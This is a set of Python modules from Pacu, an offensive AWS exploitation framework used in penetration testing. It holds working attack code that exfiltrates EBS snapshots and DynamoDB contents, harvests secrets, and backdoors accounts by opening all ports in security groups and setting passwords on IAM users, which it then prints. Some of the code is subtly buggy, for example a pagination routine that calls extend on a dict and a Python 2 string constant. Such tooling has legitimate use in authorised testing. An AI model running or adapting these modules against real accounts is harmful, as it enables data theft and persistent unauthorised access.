#!/usr/bin/env python3
"""Module for ebs_snapshot_explorer"""
import argparse
import sys
from typing import List
from typing_extensions import TypedDict

from dsnap import snapshot, utils

from pacu import Main
from pacu.core.lib import downloads_dir

module_info = {
    'name': 'ebs__download_snapshots',
    'author': 'Ryan Gerstenkorn ryan.gerstenkorn@rhinosecuritylabs.com',
    'category': 'EXFIL',
    'one_liner': 'Downloads EBS snapshots',
    'description': 'This module uses the EBS direct API to download specific snapshots to your computer. These can then be '
                   'mounted and explored using either docker or vagrant. For more information on how to mount these snapshots'
                   'see https://github.com/RhinoSecurityLabs/dsnap#mounting-in-vagrant.',
    'services': ['EC2'],
    'prerequisite_modules': ['ebs__enum_volumes_snapshots'],
    'arguments_to_autocomplete': ['--snapshot-id'],
}

parser = argparse.ArgumentParser(add_help=False, description=str(module_info['description']))
parser.add_argument(
    '--snapshot-id',
    required=False,
    help='InstanceId of instance to target'
)

parser.add_argument(
    '--region',
    required=False,
    help='InstanceId of instance to target'
)


def snapshot_prompt(snapshots: List[dict]) -> dict:
    """Prompt's the user for an item to select from the items passed. Item is expected to support the Item protocol."""
    for i, snap in enumerate(snapshots):
        print(f"{i}) Id: {snap['SnapshotId']}, VolumeId: {snap['VolumeId']}, OwnerId {snap['OwnerId']}, Size: {snap['VolumeSize']}, {snap['Description']})")
    answer = int(input('Select Snapshot: '))
    try:
        return snapshots[answer]
    except IndexError:
        print(f"Invalid selection, valid inputs are 0 through {len(snapshots) - 1}", file=sys.stderr)
        return snapshot_prompt(snapshots)


SummaryData = TypedDict('SummaryData', {
    'out_dir': str,
    'snapshot_id': str,
    'snapshot_path': str,
    'vagrantfile': str,
})


def main(args, pacu: Main):
    """Main module function, called from Pacu"""
    print = pacu.print
    session = pacu.get_active_session()
    snapshot_id = parser.parse_args(args).snapshot_id
    region = parser.parse_args(args).region

    if not snapshot_id:
        if not pacu.fetch_data(['EC2', 'Snapshots'], 'ebs__enum_volumes_snapshots', ''):
            print('Failed to fetch EBS snapshot data')
            return False

        try:
            s = snapshot_prompt(session.EC2['Snapshots'])
            snapshot_id = s['SnapshotId']
            region = s['Region']
        except UserWarning as e:
            print(*e.args)
            return False

    try:
        out_dir = downloads_dir()/'ebs/snapshots'
        snap = snapshot.LocalSnapshot(str(out_dir), snapshot_id, pacu.get_boto_session(region=region), pacu.get_botocore_conf())
    except UserWarning as e:
        print(*e.args)
        return False

    snap.fetch()

    return SummaryData(
        out_dir=str(out_dir.relative_to('.')),
        snapshot_id=snapshot_id,
        snapshot_path=str(snap.path),
        vagrantfile=str(utils.init_vagrant(out_dir, True)),
    )


def summary(data, pacu):
    msg = ''
    if not data:
        msg = 'Module execution failed'
    else:
        msg += (
                "*******************************************************************************************************\n\n"
                f" Snapshot {data['snapshot_id']} written to {data['snapshot_path']}\n" +
                "To mount this image make sure vagrant and virtualbox are installed and run: \n\n" +
                f"cd {data['out_dir']}\n"
                f"IMAGE={data['snapshot_id']}.img vagrant up\n"
                "\n*******************************************************************************************************\n\n"
        )
    return msg



#!/usr/bin/env python3
import argparse
import os
import time
import pprint

from pacu.core.secretfinder.utils import regex_checker, Color
from botocore.exceptions import ClientError


module_info = {
    # Name of the module (should be the same as the filename)
    'name': 'dynamodb__enum',

    # Name and any other notes about the author
    'author': 'Ng Song Guan (GovTech-CSG)',

    # Category of the module. Make sure the name matches an existing category.
    'category': 'ENUM',

    # One liner description of the module functionality. This shows up when a user searches for modules.
    'one_liner': 'Enumerates data from DynamoDB.',

    # Full description about what the module does and how it works
    'description': 'This module enumerates information about DynamoDB tables and can also attempt to dump the table values to a file.',

    # A list of AWS services that the module utilizes during its execution
    'services': ['DynamoDB'],

    # For prerequisite modules, try and see if any existing modules return the data that is required for your module before writing that code yourself, that way, session data can stay separated and modular.
    'prerequisite_modules': [],

    # External resources that the module depends on. Valid options are either a GitHub URL (must end in .git) or single file URL.
    'external_dependencies': [],

    # Module arguments to autocomplete when the user hits tab
    'arguments_to_autocomplete': ['--regions', '--dump'],
}

parser = argparse.ArgumentParser(add_help=False, description=module_info['description'])
parser.add_argument('--regions', required=False, default=None, help='One or more (comma separated) AWS regions in the format us-east-1. Defaults to all session regions.')
parser.add_argument('--dump', required=False, default=False, action='store_true', help='Attempt to download all information stored in the tables to separate files and scan all stored strings for secrets. Warning this could take a long time.')


def fetch_dynamodb_data(client, func, key, print, **kwargs):
    caller = getattr(client, func)
    try:
        response = caller(**kwargs)
        data = response[key]
        if isinstance(data, (dict, str)):
            return data
        while 'LastEvaluatedTableName' in response:
            response = caller(ExclusiveStartTableName=response['LastEvaluatedTableName'], **kwargs)
            data.extend(response[key])
        return data
    except client.exceptions.ResourceNotFoundException:
        pass
    except ClientError as error:
        print('  FAILURE:')
        code = error.response['Error']['Code']
        if code == 'AccessDeniedException':
            print('    MISSING NEEDED PERMISSIONS')
        else:
            print(code)
    return []


def dump_dynamodb_table(client, print, **kwargs):
    caller = getattr(client, 'scan')
    try:
        response = caller(**kwargs)
        data = response
        while 'LastEvaluatedKey' in response:
            response = caller({**kwargs, **{'ExclusiveStartKey': response['LastEvaluatedKey']}})
            data.extend(response)
        return data
    except client.exceptions.ResourceNotFoundException:
        pass
    except ClientError as error:
        print('  FAILURE:')
        code = error.response['Error']['Code']
        if code == 'AccessDeniedException':
            print('    MISSING NEEDED PERMISSIONS')
        else:
            print(code)
    return []


def main(args, pacu_main):
    session = pacu_main.get_active_session()

    ###### Don't modify these. They can be removed if you are not using the function.
    args = parser.parse_args(args)
    print = pacu_main.print
    get_regions = pacu_main.get_regions
    ######

    if args.regions:
        regions = args.regions.split(',')
    else:
        regions = get_regions('dynamodb')

    now = time.time()
    dynamodb_data = {}
    summary_data = {}
    dynamodb_data['Tables'] = []

    summary_data['dump_path'] = False
    if args.dump:
        # Name but do not write until data is found
        summary_data['dump_path'] = os.path.join(os.getcwd(), 'sessions', session.name, 'downloads', 'dynamodb_table_dump_' + str(now))

    for region in regions:
        print('Starting region {}...'.format(region))

        client = pacu_main.get_boto3_client('dynamodb', region)

        dynamodb_tables = fetch_dynamodb_data(client, 'list_tables', 'TableNames', print)
        for table in dynamodb_tables:
            print('  Enumerating info for table: {}'.format(table))
            tableData = fetch_dynamodb_data(client, 'describe_table', 'Table', print, TableName=table)
            dynamodb_data['Tables'].append(tableData)

            if args.dump:
                print('  Downloading data and finding secrets for table: {}'.format(table))
                
                dump = dump_dynamodb_table(client, print, TableName=table)

                check_secrets(session.name, dump)

                del dump['ResponseMetadata']

                writeTableData(summary_data['dump_path'], table, dump)

        if dynamodb_tables:
            summary_data[region] = len(dynamodb_tables)

    session.update(pacu_main.database, DynamoDB=dynamodb_data)

    return summary_data


def summary(data, pacu_main):
    out = ''
    tables_dumped = False
    for region in sorted(data):
        if not region == 'dump_path':
            out += '  {} tables found in {}. View more information in the DB \n'.format(data[region], region)
            tables_dumped = True
    if not out:
        out = '  No tables found'
    if data['dump_path'] and tables_dumped:
        out += '  Tables dumped to {}\n'.format(data['dump_path'])

    return out


def writeTableData(directory, table, data):
    if not os.path.exists(directory):
        os.mkdir(directory)
    path = os.path.join(directory, table + '.txt')
    with open(path, 'w+') as writeTableDump:
        writeTableDump.write(pprint.pformat(data))

def NestedDictValues(d):
    for v in d.values():
        if isinstance(v, dict):
            yield from NestedDictValues(v)
        else:
            yield v


def check_secrets(session_name, tableData):
    acc = []
    for item in tableData['Items']:
        acc += list(NestedDictValues(item))
    for val in acc:
        if isinstance(val, str):
            secrets = regex_checker(val)
            if secrets:
                [Color.print(Color.GREEN, "\t{}: {}".format(key, secrets[key])) for key in secrets]



#!/usr/bin/env python3
import argparse
import os
import time
from pacu.core.lib import strip_lines
from botocore.exceptions import ClientError
from pacu.core.lib import downloads_dir
from pacu import Main
from copy import deepcopy

module_info = {
    'name': 'ebs__enum_snapshots_unauth',
    'author': 'Yan Sandman (y4nush)',
    'category': 'RECON_UNAUTH',
    'one_liner': 'Enumerates EBS snapshots using a keyword, account ID, or wordlists.',
    'description': strip_lines('''This module will enumerate all the EBS snapshots across all regions, looking for
     snapshots that contain a specific keyword in their description, associated with a specific account ID, or match
     keywords/account IDs from wordlists. The results will be saved in the session's directory and printed to
     the console in the summary if there are 25 or fewer results.'''),
    'services': ['EC2'],
    'prerequisite_modules': [],
    'arguments_to_autocomplete': ['--keyword', '--account-id', '--keyword-wordlist', '--account-id-wordlist'],
}

parser = argparse.ArgumentParser(add_help=False, description=module_info['description'])


parser.add_argument(
    '--keyword',
    help='Keyword to search for in EBS snapshot descriptions.'
)
parser.add_argument(
    '--account-id',
    help='AWS account ID to search for associated EBS snapshots.'
)
parser.add_argument(
    '--keyword-wordlist',
    help='File path to a wordlist of keywords to search for in EBS snapshot descriptions.'
)
parser.add_argument(
    '--account-id-wordlist',
    help='File path to a wordlist of AWS account IDs to search for associated EBS snapshots.'
)


def load_wordlist(file_path):
    try:
        with open(file_path, 'r') as file:
            return file.read().splitlines()
    except Exception as e:
        return str(e)


def search_snapshots(ec2_client, filters):
    try:
        return ec2_client.describe_snapshots(Filters=filters).get('Snapshots', [])
    except ClientError as error:
        print('    FAILURE:')
        print('    ' + error.response['Error']['Code'])
        return []


def main(args, pacu_main: 'Main'):
    session = pacu_main.get_active_session()
    args = parser.parse_args(args)
    print = pacu_main.print
    get_regions = pacu_main.get_regions

    ec2_data = deepcopy(session.EC2) if hasattr(session, 'EC2') else {}
    if 'Volumes' not in ec2_data.keys():
        ec2_data['Volumes'] = []
    if 'Snapshots' not in ec2_data.keys():
        ec2_data['Snapshots'] = []

    existing_snapshots_ids = {snapshot['SnapshotId'] for snapshot in ec2_data['Snapshots']}
    snapshots_found = []  # Store all the snapshots found during the current execution

    keyword_list = [args.keyword] if args.keyword else load_wordlist(
        args.keyword_wordlist) if args.keyword_wordlist else []
    account_id_list = [args.account_id] if args.account_id else load_wordlist(
        args.account_id_wordlist) if args.account_id_wordlist else []

    if not keyword_list and not account_id_list:
        print("Please specify a keyword, account ID, keyword wordlist, or account ID wordlist.")
        return

    regions = get_regions('ec2')
    if not regions:
        print("No regions found. Exiting...")
        return

    session_name = session.name
    directory = str(downloads_dir() / session_name / 'ebs')
    if not os.path.exists(directory):
        os.makedirs(directory)

    for region in regions:
        print('Starting region {}...'.format(region))
        ec2Client = pacu_main.get_boto3_client('ec2', region)

        for keyword in keyword_list:
            filters = [{'Name': 'status', 'Values': ['completed']}, {'Name': 'description', 'Values': [f'*{keyword}*']}]
            snapshots = search_snapshots(ec2Client, filters)
            for snapshot in snapshots:
                snapshot['Region'] = region
                snapshot['Keyword'] = keyword
                snapshot.setdefault('AccountId', '')
                snapshot.setdefault('Description', '')
                print('Snapshot found: {}'.format(snapshot['SnapshotId']))
                snapshots_found.append(snapshot)
                if snapshot['SnapshotId'] not in existing_snapshots_ids:
                    ec2_data['Snapshots'].append(snapshot)
                    existing_snapshots_ids.add(snapshot['SnapshotId'])

        for account_id in account_id_list:
            filters = [{'Name': 'status', 'Values': ['completed']}, {'Name': 'owner-id', 'Values': [account_id]}]
            snapshots = search_snapshots(ec2Client, filters)
            for snapshot in snapshots:
                snapshot['Region'] = region
                snapshot['AccountId'] = account_id
                snapshot.setdefault('Keyword', '')
                snapshot.setdefault('Description', '')
                print('[+] Snapshot found: {}'.format(snapshot['SnapshotId']))
                snapshots_found.append(snapshot)
                if snapshot['SnapshotId'] not in existing_snapshots_ids:
                    ec2_data['Snapshots'].append(snapshot)
                    existing_snapshots_ids.add(snapshot['SnapshotId'])

    snapshot_file_path = '{}/ebs_snapshots_{}.txt'.format(directory, time.time())
    with open(snapshot_file_path, 'w+') as snapshot_file:
        for snapshot in snapshots_found:
            snapshot_file.write(
                'Keyword/AccountId: {}, SnapshotId: {}, Region: {}, Description: {}, OwnerId: {}, Encrypted: {}\n'.format(
                    snapshot.get('Keyword') or snapshot.get('AccountId'), snapshot['SnapshotId'], snapshot['Region'],
                    snapshot['Description'], snapshot['OwnerId'], snapshot['Encrypted']
                ))

    # Update the session data with the modified ec2_data
    session.update(pacu_main.database, EC2=ec2_data)

    summary_data = {
        'snapshots': snapshots_found,
        'snapshot_file_path': snapshot_file_path
    }
    return summary_data


def summary(data, pacu_main):
    out = '  {} EBS Snapshots found\n'.format(len(data['snapshots']))
    if len(data['snapshots']) <= 25:
        for snapshot in data['snapshots']:
            out += '    Keyword/AccountId: {}, SnapshotId: {}, Region: {}, Description: {}, OwnerId: {}, Encrypted: {}\n'.format(
                snapshot.get('Keyword') or snapshot.get('AccountId'), snapshot['SnapshotId'], snapshot['Region'],
                snapshot['Description'], snapshot['OwnerId'], snapshot['Encrypted']
            )
    else:
        out += '  More than 25 results found. Snapshot information is written to:\n    {}\n'.format(data['snapshot_file_path'])
    return out



#!/usr/bin/env python3
import argparse
from botocore.exceptions import ClientError


module_info = {
    # Name of the module (should be the same as the filename)
    'name': 'ec2__backdoor_ec2_sec_groups',

    # Name and any other notes about the author
    'author': 'Spencer Gietzen of Rhino Security Labs based on the idea from https://github.com/dagrz/aws_pwn/blob/master/persistence/backdoor_all_security_groups.py',

    # Category of the module. Make sure the name matches an existing category.
    'category': 'PERSIST',

    # One liner description of the module functionality. This shows up when a user searches for modules.
    'one_liner': 'Adds backdoor rules to EC2 security groups.',

    # Description about what the module does and how it works
    'description': 'This module adds rules to backdoor EC2 security groups. It attempts to open ingress port ranges from an IP of your choice.',

    # A list of AWS services that the module utilizes during its execution
    'services': ['EC2'],

    # For prerequisite modules, try and see if any existing modules return the data that is required for your module before writing that code yourself, that way, session data can stay separated and modular.
    'prerequisite_modules': ['ec2__enum'],

    # Module arguments to autocomplete when the user hits tab
    'arguments_to_autocomplete': ['--ip', '--port-range', '--protocol', '--groups'],
}

parser = argparse.ArgumentParser(add_help=False, description=module_info['description'])

parser.add_argument('--ip', required=False, default='0.0.0.0/0', help='The IP address or CIDR range to allow access to (ex: 127.0.0.1/24). The default is to allow access from any IP address (0.0.0.0/0).')
parser.add_argument('--port-range', required=False, default='1-65535', help='The port range to open for each EC2 security group in the format start-end (ex: 1-455). The default range is every port (1-65535).')
parser.add_argument('--protocol', required=False, default='tcp', help='The protocol for the IP range specified. Options are: TCP, UDP, ICMP, or ALL. The default is TCP. WARNING: When supplying ALL, AWS will automatically allow traffic on all ports, regardless of the range specified. More information is available here: https://boto3.readthedocs.io/en/latest/reference/services/ec2.html#EC2.Client.authorize_security_group_ingress')
parser.add_argument('--groups', required=False, default=None, help='The EC2 security groups to backdoor in the format of a comma separated list of name@region. If omitted, all security groups will be backdoored.')


def main(args, pacu_main):
    session = pacu_main.get_active_session()

    ###### Don't modify these. They can be removed if you are not using the function.
    args = parser.parse_args(args)
    print = pacu_main.print
    fetch_data = pacu_main.fetch_data
    ######

    groups = []

    summary_data = {}

    client = pacu_main.get_boto3_client('ec2', 'us-east-1')

    if args.groups is not None:
        groups_and_regions = args.groups.split(',')
        for group in groups_and_regions:
            groups.append({
                'GroupName': group.split('@')[0],
                'Region': group.split('@')[1]
            })
    else:
        if fetch_data(['EC2', 'SecurityGroups'], module_info['prerequisite_modules'][0], '--security-groups') is False:
            print('FAILURE')
            print('  Sub-module execution failed.')
            return
        groups = session.EC2['SecurityGroups']
    summary_data['BackdooredCount'] = 0
    print('Applying Rules...')
    for group in groups:
        print('  Group: {}'.format(group['GroupName']))

        client = pacu_main.get_boto3_client('ec2', group['Region'])

        try:
            client.authorize_security_group_ingress(
                GroupName=group['GroupName'],
                CidrIp=args.ip,
                FromPort=int(args.port_range.split('-')[0]),
                ToPort=int(args.port_range.split('-')[1]),
                IpProtocol=args.protocol
            )
            print('    SUCCESS')
            summary_data['BackdooredCount'] += 1
        except ClientError as error:
            code = error.response['Error']['Code']
            print('FAILURE: ')
            if code == 'UnauthorizedOperation':
                print('  Access denied to AuthorizeSecurityGroupIngress.')
                break
            elif code == 'InvalidPermission.Duplicate':
                print('      Rule already exists.')
            else:
                print('  ' + code)
    return summary_data


def summary(data, pacu_main):
    out = ''
    if 'BackdooredCount' in data:
        out += '  {} security group(s) successfully backdoored.\n'.format(data['BackdooredCount'])
    return out



from sqlalchemy import orm

from pacu.utils import stringify


class ModelUpdateMixin:
    def update(self, database: orm.session.Session, commit: bool = True, **kwargs) -> None:
        """ Instead of requiring three lines to update a single field inside
        a database session, this method updates a single field in one line.

        Example usage:
            session.update(database, field_name={'json': ...}) """

        for key, value in kwargs.items():
            value = stringify(value)
            setattr(self, key, value)

        database.add(self)

        if commit:
            database.commit()



#!/usr/bin/env python3
import argparse
from random import choice
import string
from botocore.exceptions import ClientError


module_info = {
    # Name of the module (should be the same as the filename)
    'name': 'iam__backdoor_users_password',

    # Name and any other notes about the author
    'author': 'Spencer Gietzen of Rhino Security Labs based on the idea from https://github.com/dagrz/aws_pwn/blob/master/persistence/backdoor_all_users.py',

    # Category of the module. Make sure the name matches an existing category.
    'category': 'PERSIST',

    # One liner description of the module functionality. This shows up when a user searches for modules.
    'one_liner': 'Adds a password to users without one.',

    # Description about what the module does and how it works
    'description': 'This module attempts to add a password to users in the account. If all users are going to be backdoored, if it has not already been run, this module will run "enum_users_roles_policies_groups" to fetch all of the users in the account. Passwords can not be added to user accounts that 1) have a password already or 2) have ever had a password, regardless if it has been used before or not. If the module detects that a user already has a password, they will be ignored.',

    # A list of AWS services that the module utilizes during its execution
    'services': ['IAM'],

    # For prerequisite modules, try and see if any existing modules return the data that is required for your module before writing that code yourself, that way, session data can stay separated and modular.
    'prerequisite_modules': ['iam__enum_users_roles_policies_groups'],

    # Module arguments to autocomplete when the user hits tab
    'arguments_to_autocomplete': ['--usernames', '--update'],
}

parser = argparse.ArgumentParser(add_help=False, description=module_info['description'])

parser.add_argument('--usernames', required=False, default=None, help='A comma-separated list of usernames of users in the AWS account to backdoor. If not supplied, it defaults to every user in the account')
parser.add_argument('--update', required=False, default=False, action='store_true', help='Try to update login profiles instead of creating a new one. This can be used to change other users passwords who already have a login profile.')


def main(args, pacu_main):
    session = pacu_main.get_active_session()

    ###### Don't modify these. They can be removed if you are not using the function.
    args = parser.parse_args(args)
    print = pacu_main.print
    input = pacu_main.input
    fetch_data = pacu_main.fetch_data
    ######

    users = []
    summary_data = {}
    client = pacu_main.get_boto3_client('iam')

    if args.usernames is not None:
        if ',' in args.usernames:
            users = args.usernames.split(',')
        else:
            users = [args.usernames]

    else:
        if fetch_data(['IAM', 'Users'], module_info['prerequisite_modules'][0], '--users') is False:
            print('FAILURE')
            print('  SUB-MODULE EXECUTION FAILED')
            return
        for user in session.IAM['Users']:
            if 'PasswordLastUsed' not in user or args.update:
                users.append(user['UserName'])
    try:
        password_policy = client.get_account_password_policy()
    except:
        # Policy unable to be fetched, set to None so that a 128 char password
        # with all types of characters gets created below
        password_policy = None

    target_user = ''
    password = create_valid_password(password_policy)
    summary_data['backdoored_password_count'] = 0

    if args.update:
        func = 'update_login_profile'
        print('Modifying an IAM user\'s current password')
    else:
        func = 'create_login_profile'
        print('Creating an IAM user password')
    caller = getattr(client, func)

    for user in users:
        if args.usernames is None:
            target_user = input('  User: {} (y/n)? '.format(user))
            if target_user.lower() != 'y':
                continue
        else:
            print('  User: {}'.format(user))

        password = create_valid_password(password_policy)
        try:
            caller(
                UserName=user,
                Password=password,
                PasswordResetRequired=False)
        except ClientError as error:
            code = error.response['Error']['Code']
            if code == 'AccessDenied':
                print('    FAILURE: MISSING NEEDED PERMISSIONS')
            elif code == 'EntityAlreadyExists':
                print('    FAILURE: LOGIN PROFILE ALREADY EXISTS')
            else:
                print('    FAILURE: {}'.format(code))
            quit = input('    Continue? (y/n) ')
            if quit.lower() != 'y':
                print('    Exiting...')
                return summary_data
            continue
        print('    Password successfully changed')
        print('    Password: {}'.format(password))
        summary_data['backdoored_password_count'] += 1
    return summary_data


def summary(data, pacu_main):
    out = ''
    if 'backdoored_password_count' in data:
        count = data['backdoored_password_count']
        out += '  {} user(s) backdoored.\n'.format(count)
    return out


def create_valid_password(password_policy: None) -> str:
    symbols = '!@#$%^&*()_+=-\][{}|;:",./?><`~'
    password = ''.join(choice(string.ascii_lowercase) for _ in range(3))
    try:
        if password_policy['RequireNumbers'] is True:
            password += ''.join(choice(string.digits) for _ in range(3))
        if password_policy['RequireSymbols'] is True:
            password += ''.join(choice(symbols) for _ in range(3))
        if password_policy['RequireUppercaseCharacters'] is True:
            password += ''.join(choice(string.uppercase) for _ in range(3))
        if password_policy['MinimumPasswordLength'] > 0:
            while len(password) < password_policy['MinimumPasswordLength']:
                password += choice(string.digits)
    except:
        # Password policy couldn't be grabbed for some reason, make a max-length
        # password with all types of characters, so no matter what, it will be accepted.
        characters = string.ascii_lowercase + string.ascii_uppercase + string.digits + symbols
        password = ''.join(choice(characters) for _ in range(128))
    return password



#!/usr/bin/env python3
import argparse
from copy import deepcopy
import time
import random
import os

from botocore.exceptions import ClientError

from pacu.core.lib import strip_lines, save
from pacu import Main

module_info = {
    'name': 'ebs__enum_volumes_snapshots',
    'author': 'Spencer Gietzen of Rhino Security Labs',
    'category': 'ENUM',
    'one_liner': 'Enumerates EBS volumes and snapshots and logs any without encryption.',
    'description': strip_lines('''
        This module will enumerate all of the Elastic Block Store volumes, snapshots, and snapshot permissions in the
        account and save the data to the current session. It will also note whether or not each volume/snapshot is
        encrypted, then write a list of the unencrypted volumes to
        ~/.local/share/pacu/sessions/[current_session_name]/downloads/unencrypted_ebs_volumes_[timestamp].csv and 
        unencrypted snapshots to ~/.local/share/pacu/sessions/[current_session_name]/downloads/unencrypted_ebs_snapshots_[timestamp].csv
        in .CSV format.
    '''),
    'services': ['EC2'],
    'prerequisite_modules': [],
    'arguments_to_autocomplete': ['--regions', '--vols', '--snaps', '--account-ids', '--snapshot-permissions'],
}

parser = argparse.ArgumentParser(add_help=False, description=module_info['description'])

parser.add_argument(
    '--regions',
    required=False,
    default=None,
    help='One or more (comma separated) AWS regions in the format "us-east-1". Defaults to all session regions.'
)
parser.add_argument(
    '--vols',
    required=False,
    default=False,
    action='store_true',
    help=('If this argument is passed without --snaps, this module will only enumerate volumes. If neither are passed, '
          'both volumes and snapshots will be enumerated.')
)
parser.add_argument(
    '--snaps',
    required=False,
    default=False,
    action='store_true',
    help=strip_lines('''
        If this argument is passed without --vols, this module will only enumerate snapshots. If neither are passed, 
        both volumes and snapshots will be enumerated.
    ''')
)
parser.add_argument(
    '--snapshot-permissions',
    required=False,
    default=False,
    action='store_true',
    help=strip_lines('''
        Capture permissions for each found snapshot. Found permissions will be captured in the database and written to 
        the sessions downloads directory as snapshot_permissions.txt
    ''')
)
parser.add_argument(
    '--account-ids',
    required=False,
    default=None,
    help=strip_lines('''
        One or more (comma separated) AWS account IDs. If snapshot enumeration is enabled, then this module will fetch 
        all snapshots owned by each account in this list of AWS account IDs. Defaults to the current user accounts AWS 
        account ID.
    ''')
)


def main(args, pacu_main: 'Main'):
    session = pacu_main.get_active_session()

    ###### Don't modify these. They can be removed if you are not using the function.
    args = parser.parse_args(args)
    print = pacu_main.print
    input = pacu_main.input

    key_info = pacu_main.key_info
    get_regions = pacu_main.get_regions
    ######

    if args.snaps is False and args.vols is False:
        args.snaps = args.vols = True

    ec2_data = deepcopy(session.EC2)
    if 'Volumes' not in ec2_data.keys():
        ec2_data['Volumes'] = []
    if 'Snapshots' not in ec2_data.keys():
        ec2_data['Snapshots'] = []
    session.update(pacu_main.database, EC2=ec2_data)

    if args.regions is None:
        regions = get_regions('ec2')
        if regions is None or regions == [] or regions == '' or regions == {}:
            print('This module is not supported in any regions specified in the current sessions region set. Exiting...')
            return
    else:
        regions = args.regions.split(',')

    account_ids = []

    if args.account_ids is None and args.snaps is True:
        user = key_info()

        if 'AccountId' in user and user['AccountId'] is not None:
            account_ids = [user['AccountId']]
        else:
            current_account = input(strip_lines('''
                No account IDs were passed in as arguments and the account ID for the current user has not been stored 
                in this session yet. An account ID is required to get valid results from the snapshot enumeration 
                portion of this module. If you know the current users account ID then enter it now, otherwise, enter 
                y to try and fetch it, or enter n to skip EBS snapshot enumeration. ([account_id]/y/n)
            '''))

            if current_account is None or current_account == '' or current_account.lower() == 'n':
                account_ids = []

            elif current_account == 'y':
                try:
                    client = pacu_main.get_boto3_client('sts')

                    identity = client.get_caller_identity()

                    account_ids = [identity['Account']]

                    # Might as well fill current key data while it is here
                    session_aws_key = session.get_active_aws_key(pacu_main.database)
                    session_aws_key.update(
                        pacu_main.database,
                        account_id=identity['Account'],
                        arn=identity['Arn'],
                        user_id=identity['UserId'],
                    )
                except Exception as error:
                    print('Error running sts.get_caller_identity. It is possible that the account ID has been returned '
                          'in this error: {}'.format(error))
                    current_account = input('If the AWS account ID was returned in the previous error, enter it now to '
                                            'continue, or enter n to skip EBS snapshot enumeration. ([account_id]/n) ')
                    if current_account == 'n':
                        account_ids = []
                    else:
                        account_ids = [current_account]

            else:
                account_ids = [current_account]

    elif args.snaps is True:
        account_ids = args.account_ids.split(',')

    else:
        pass  # Ignore args.account_ids if args.snaps is False

    client = pacu_main.get_boto3_client('ec2', random.choice(regions))

    now = time.time()

    all_vols = []
    all_snaps = []
    volumes_csv_data = []
    snapshots_csv_data = []
    snapshot_permissions = {
        'Public': [],
        'Shared': {},
        'Private': []
    }
    for region in regions:
        print('Starting region {} (this may take a while if there are thousands of EBS volumes/snapshots)...'.format(region))
        client = pacu_main.get_boto3_client('ec2', region)

        if args.vols is True:
            # Start EBS Volumes in this region
            count = 0
            response = None
            next_token = False

            while (response is None or 'NextToken' in response):
                if next_token is False:
                    try:
                        response = client.describe_volumes(
                            MaxResults=500  # Using this as AWS can timeout the connection if there are too many volumes to return in one
                        )
                    except ClientError as error:
                        code = error.response['Error']['Code']
                        print('FAILURE: ')
                        if code == 'UnauthorizedOperation':
                            print('  Access denied to DescribeVolumes.')
                        else:
                            print('  ' + code)
                        print('Skipping volume enumeration...')
                        break
                else:
                    response = client.describe_volumes(
                        MaxResults=500,
                        NextToken=next_token
                    )

                if 'NextToken' in response:
                    next_token = response['NextToken']

                for volume in response['Volumes']:
                    volume['Region'] = region
                    all_vols.append(volume)
                    if volume['Encrypted'] is False:
                        name = ''
                        if 'Tags' in volume:
                            for tag in volume['Tags']:
                                if tag['Key'] == 'Name':
                                    name = tag['Value']
                                    break
                        volumes_csv_data.append('{},{},{}\n'.format(name, volume['VolumeId'], region))

                count += len(response['Volumes'])

            print('    {} volume(s) found'.format(count))

        if args.snaps is True and not account_ids == []:
            # Start EBS Snapshots in this region
            count = 0
            response = None
            next_token = False

            while (response is None or 'NextToken' in response):
                if next_token is False:
                    try:
                        response = client.describe_snapshots(
                            OwnerIds=account_ids,
                            MaxResults=1000  # Using this as AWS can timeout the connection if there are too many snapshots to return in one
                        )
                    except ClientError as error:
                        code = error.response['Error']['Code']
                        print('FAILURE: ')
                        if code == 'UnauthorizedOperation':
                            print('  Access denied to DescribeSnapshots.')
                        else:
                            print('  ' + code)
                        print('Skipping snapshot enumeration...')
                        break
                else:
                    response = client.describe_snapshots(
                        OwnerIds=account_ids,
                        NextToken=next_token,
                        MaxResults=1000
                    )

                if 'NextToken' in response:
                    next_token = response['NextToken']

                for snapshot in response['Snapshots']:
                    snapshot['Region'] = region

                    if args.snapshot_permissions:
                        print('    Starting enumeration for Snapshot Permissions...')
                        snapshot['CreateVolumePermissions'] = client.describe_snapshot_attribute(
                            Attribute='createVolumePermission',
                            SnapshotId=snapshot['SnapshotId']
                        )['CreateVolumePermissions']

                        if not snapshot['CreateVolumePermissions']:
                            snapshot_permissions['Private'].append(snapshot['SnapshotId'])
                        elif 'UserId' in snapshot['CreateVolumePermissions'][0]:
                            snapshot_permissions['Shared'][snapshot['SnapshotId']] = [entry['UserId'] for entry in snapshot['CreateVolumePermissions']]
                        elif 'Group' in snapshot['CreateVolumePermissions'][0]:
                            snapshot_permissions['Public'].append(snapshot['SnapshotId'])

                    all_snaps.append(snapshot)
                    if snapshot['Encrypted'] is False:
                        name = ''
                        if 'Tags' in snapshot:
                            for tag in snapshot['Tags']:
                                if tag['Key'] == 'Name':
                                    name = tag['Value']
                                    break
                        snapshots_csv_data.append('{},{},{}\n'.format(name, snapshot['SnapshotId'], region))

                count += len(response['Snapshots'])

            print('    {} snapshot(s) found'.format(count))

    summary_data = {'snapshot_permissions': args.snapshot_permissions}
    if args.vols:
        ec2_data['Volumes'] = all_vols
        summary_data['volumes'] = len(ec2_data['Volumes'])
        p = 'unencrypted_ebs_volumes_{}.csv'.format(now)
        with save(p) as f:
            f.write('Volume Name,Volume ID,Region\n')
            print('  Writing data for {} volumes...'.format(len(volumes_csv_data)))
            for line in volumes_csv_data:
                f.write(line)
        summary_data['volumes_csv_path'] = p

    if args.snaps:
        ec2_data['Snapshots'] = all_snaps
        summary_data['snapshots'] = len(ec2_data['Snapshots'])
        path = 'unencrypted_ebs_snapshots_{}.csv'.format(now)
        with save(path) as f:
            f.write('Snapshot Name,Snapshot ID,Region\n')
            print('  Writing data for {} snapshots...'.format(len(snapshots_csv_data)))
            for line in snapshots_csv_data:
                f.write(line)
        summary_data['snapshots_csv_path'] = path

    if args.snapshot_permissions:
        permission_data = {
            'Public': len(snapshot_permissions['Public']),
            'Shared': len(snapshot_permissions['Shared']),
            'Private': len(snapshot_permissions['Private']),
        }
        temp = permission_data.copy()
        summary_data.update(temp)
        path = 'snapshot_permissions_' + str(now) + '.txt'
        with save(path) as f:
            f.write('Public:\n')
            for public in snapshot_permissions['Public']:
                f.write('    {}'.format(public))
            f.write('Shared:\n')
            for snap in snapshot_permissions['Shared']:
                f.write('    {}\n'.format(snap))
                for aws_id in snapshot_permissions['Shared'][snap]:
                    f.write('        {}\n'.format(aws_id))
            f.write('Private:\n')
            for private in snapshot_permissions['Private']:
                f.write('    {}\n'.format(private))
            summary_data['snapshot-permissions-path'] = path
